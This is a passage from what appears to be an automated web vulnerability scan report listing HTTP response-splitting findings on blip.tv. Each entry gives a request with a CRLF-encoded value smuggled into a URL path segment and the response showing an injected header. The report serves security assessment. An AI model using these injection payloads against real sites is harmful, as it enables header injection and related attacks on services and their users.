Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/ca8ba
21bce5267e9
/episodes
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:58 GMT
X-Varnish: 344232109
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/ca8ba
21bce5267e9/episodes"
...[SNIP]...

2.20. http://blip.tv/dashboard/episodes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/episodes

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d9997%0d%0a5d15dbd92b1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/d9997%0d%0a5d15dbd92b1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/d9997
5d15dbd92b1

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 1248910493
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/d9997
5d15dbd92b1
...[SNIP]...

2.21. http://blip.tv/dashboard/ftp/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ftp/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e70d7%0d%0ac59805585bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e70d7%0d%0ac59805585bf/ftp/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e70d7
c59805585bf
/ftp/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1025272433
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e70d7
c59805585bf/ftp/">her
...[SNIP]...

2.22. http://blip.tv/dashboard/ftp/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ftp/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 24217%0d%0a7d2bf5af83f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/24217%0d%0a7d2bf5af83f/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dashboard/24217
7d2bf5af83f
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 304
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1025272485
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/24217
7d2bf5af83f
...[SNIP]...

2.23. http://blip.tv/dashboard/players [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/players

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fadc6%0d%0a52a7d16e356 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fadc6%0d%0a52a7d16e356/players HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/fadc6
52a7d16e356
/players
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:58 GMT
X-Varnish: 1274886873
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fadc6
52a7d16e356/players">
...[SNIP]...

2.24. http://blip.tv/dashboard/players [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/players

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b9169%0d%0a744b6bd07a3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/b9169%0d%0a744b6bd07a3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dashboard/b9169
744b6bd07a3

Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 344232158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/b9169
744b6bd07a3
...[SNIP]...

2.25. http://blip.tv/dashboard/stats [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/stats

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f9d9c%0d%0a0f7100e798 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f9d9c%0d%0a0f7100e798/stats HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/f9d9c
0f7100e798
/stats
Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:39:02 GMT
X-Varnish: 344232691
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f9d9c
0f7100e798/stats">her
...[SNIP]...

2.26. http://blip.tv/dashboard/stats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/stats

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1a59b%0d%0acdc1632a28a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/1a59b%0d%0acdc1632a28a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/1a59b
cdc1632a28a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:39:02 GMT
X-Varnish: 1324533080
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/1a59b
cdc1632a28a
...[SNIP]...

2.27. http://blip.tv/dashboard/upload [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/upload

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 73508%0d%0a92f80fae78f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /73508%0d%0a92f80fae78f/upload HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/73508
92f80fae78f
/upload
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1274887304
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/73508
92f80fae78f/upload">h
...[SNIP]...

2.28. http://blip.tv/dashboard/upload [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/upload

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload efee6%0d%0a8d9e887dfe0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/efee6%0d%0a8d9e887dfe0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/efee6
8d9e887dfe0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1274887357
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/efee6
8d9e887dfe0
...[SNIP]...

2.29. http://blip.tv/dmca/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dmca/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3dd56%0d%0aac3f74482ba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3dd56%0d%0aac3f74482ba/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/3dd56
ac3f74482ba
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:10 GMT
X-Varnish: 2146052427
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/3dd56
ac3f74482ba/">here</a
...[SNIP]...

2.30. http://blip.tv/dtd/blip/1.0 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/blip/1.0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ab0a%0d%0a59b45554341 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ab0a%0d%0a59b45554341/blip/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7ab0a
59b45554341
/blip/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:39:17 GMT
X-Varnish: 344235125
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7ab0a
59b45554341/blip/1.0"
...[SNIP]...

2.31. http://blip.tv/dtd/blip/1.0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/blip/1.0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4a14c%0d%0a80f2ff6cb71 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dtd/4a14c%0d%0a80f2ff6cb71/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dtd/4a14c
80f2ff6cb71
/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:39:17 GMT
X-Varnish: 1025275088
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/4a14c
80f2ff6cb71/1.0">
...[SNIP]...

2.32. http://blip.tv/dtd/blip/1.0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/blip/1.0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f6e99%0d%0ad581e6a5fe4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /dtd/blip/f6e99%0d%0ad581e6a5fe4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dtd/blip/f6e99
d581e6a5fe4

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:39:18 GMT
X-Varnish: 344235211
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/blip/f6e99
d581e6a5fe4"
...[SNIP]...

2.33. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/mediaad/1.0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 92757%0d%0abadafac1cb4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /92757%0d%0abadafac1cb4/mediaad/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/92757
badafac1cb4
/mediaad/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:39:18 GMT
X-Varnish: 2146053727
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/92757
badafac1cb4/mediaad/1
...[SNIP]...

2.34. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/mediaad/1.0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 80dc3%0d%0afb8c85f6d6f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dtd/80dc3%0d%0afb8c85f6d6f/1.0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dtd/80dc3
fb8c85f6d6f
/1.0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:39:19 GMT
X-Varnish: 1025275279
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/80dc3
fb8c85f6d6f/1.0">
...[SNIP]...

2.35. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dtd/mediaad/1.0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c6ffc%0d%0a8d9673043c6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /dtd/mediaad/c6ffc%0d%0a8d9673043c6 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dtd/mediaad/c6ffc
8d9673043c6

Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:39:19 GMT
X-Varnish: 2146053849
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dtd/mediaad/c6ffc
8d9673043
...[SNIP]...

2.36. http://blip.tv/epk [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /epk

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c5912%0d%0aa5e22b55bb8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c5912%0d%0aa5e22b55bb8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c5912
a5e22b55bb8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 278
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 1498223475
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c5912
a5e22b55bb8">here</a>
...[SNIP]...

2.37. http://blip.tv/faq [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /faq

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1364e%0d%0a742bb6d3cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1364e%0d%0a742bb6d3cc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/1364e
742bb6d3cc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 277
Date: Thu, 20 Jan 2011 00:39:03 GMT
X-Varnish: 1498222509
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/1364e
742bb6d3cc">here</a>.
...[SNIP]...

2.38. http://blip.tv/file/3006747 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/3006747

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 92515%0d%0a3a5487ed0a6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /92515%0d%0a3a5487ed0a6/3006747 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/92515
3a5487ed0a6
/3006747
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1274882698
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/92515
3a5487ed0a6/3006747">
...[SNIP]...

2.39. http://blip.tv/file/3006747 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/3006747

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 33f2f%0d%0aa80c1df9336 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/33f2f%0d%0aa80c1df9336 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/33f2f
a80c1df9336

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 344228099
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/33f2f
a80c1df9336">her
...[SNIP]...

2.40. http://blip.tv/file/4341289 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4341289

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2defe%0d%0a85750fef9bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2defe%0d%0a85750fef9bf/4341289 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2defe
85750fef9bf
/4341289
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 1274882913
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2defe
85750fef9bf/4341289">
...[SNIP]...

2.41. http://blip.tv/file/4341289 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4341289

Issue detail

